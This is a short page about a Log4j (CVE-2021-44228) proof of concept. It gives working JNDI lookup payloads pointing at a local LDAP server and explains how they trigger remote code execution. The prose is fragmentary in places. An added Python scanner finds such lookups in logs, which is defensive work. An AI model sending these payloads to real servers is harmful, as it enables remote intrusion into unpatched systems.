Log4j-RCE (CVE-2021-44228) Proof of Concept with additional information
This is a proof of concept of the log4j rce.
Here are some links for the CVE-2021-44228:
This bug affects nearly all log4j2 and maybe log4j1 versions. The recommended version to use is 2.15.0 which fixes the exploit.
${jndi:ldap://127.0.0.1/e}
in the chat. If there is an open socket on port 389
log4j tries to connect and blocks further communication until a timeout occurs.
THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!
which is a serialized string object from the ldap server.
${jndi:ldap://127.0.0.1/exe}
in the chat. If -Dcom.sun.jndi.ldap.object.trustURLCodebase=true
is set, the remote code execution will happen.
This project is only for educational purposes.
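For defenders, the lookup strings above are also what to search for in server logs. The following Python scanner is an added example, not part of this project: the log format and sample lines are constructed, and it matches only the plain ${jndi:...} form shown above, reporting the host and port (389 by default for LDAP) that the logger would have tried to reach so the hit can be correlated with outbound connections.

```python
import re
from urllib.parse import urlsplit

# Plain form of the lookup shown on this page: ${jndi:<scheme>://<host>[:port]/<path>}
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+://[^}\s]+)\}", re.IGNORECASE)

# Default ports used when the lookup URL names none (LDAP is 389, as noted above).
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "rmi": 1099}


def find_jndi_lookups(line):
    """Return one dict per JNDI lookup found in a single log line."""
    hits = []
    for match in JNDI_LOOKUP.finditer(line):
        url = urlsplit(match.group(1))
        scheme = url.scheme.lower()
        try:
            port = url.port  # raises ValueError on a malformed port
        except ValueError:
            port = None
        hits.append({
            "lookup": match.group(0),
            "scheme": scheme,
            "host": url.hostname,
            "port": port or DEFAULT_PORTS.get(scheme),
            "path": url.path,
        })
    return hits


def scan(lines):
    """Return (line_number, hit) pairs for every lookup in the given lines."""
    return [(number, hit)
            for number, line in enumerate(lines, start=1)
            for hit in find_jndi_lookups(line)]


# Constructed sample log lines (hypothetical chat-server log format).
SAMPLE_LOG = [
    "[12:00:01] [Server thread/INFO]: <alice> hello",
    "[12:00:05] [Server thread/INFO]: <bob> ${jndi:ldap://127.0.0.1/e}",
    "[12:00:07] [Server thread/INFO]: <alice> what was that?",
    "[12:00:09] [Server thread/INFO]: <bob> ${jndi:ldap://127.0.0.1:1389/exe}",
]

if __name__ == "__main__":
    for number, hit in scan(SAMPLE_LOG):
        print(f"line {number}: {hit['lookup']} -> "
              f"{hit['scheme']}://{hit['host']}:{hit['port']}{hit['path']}")
```

A hit on a host that ran a log4j version older than the fixed one should be followed up by checking for outbound connections to the reported host and port at the same timestamp.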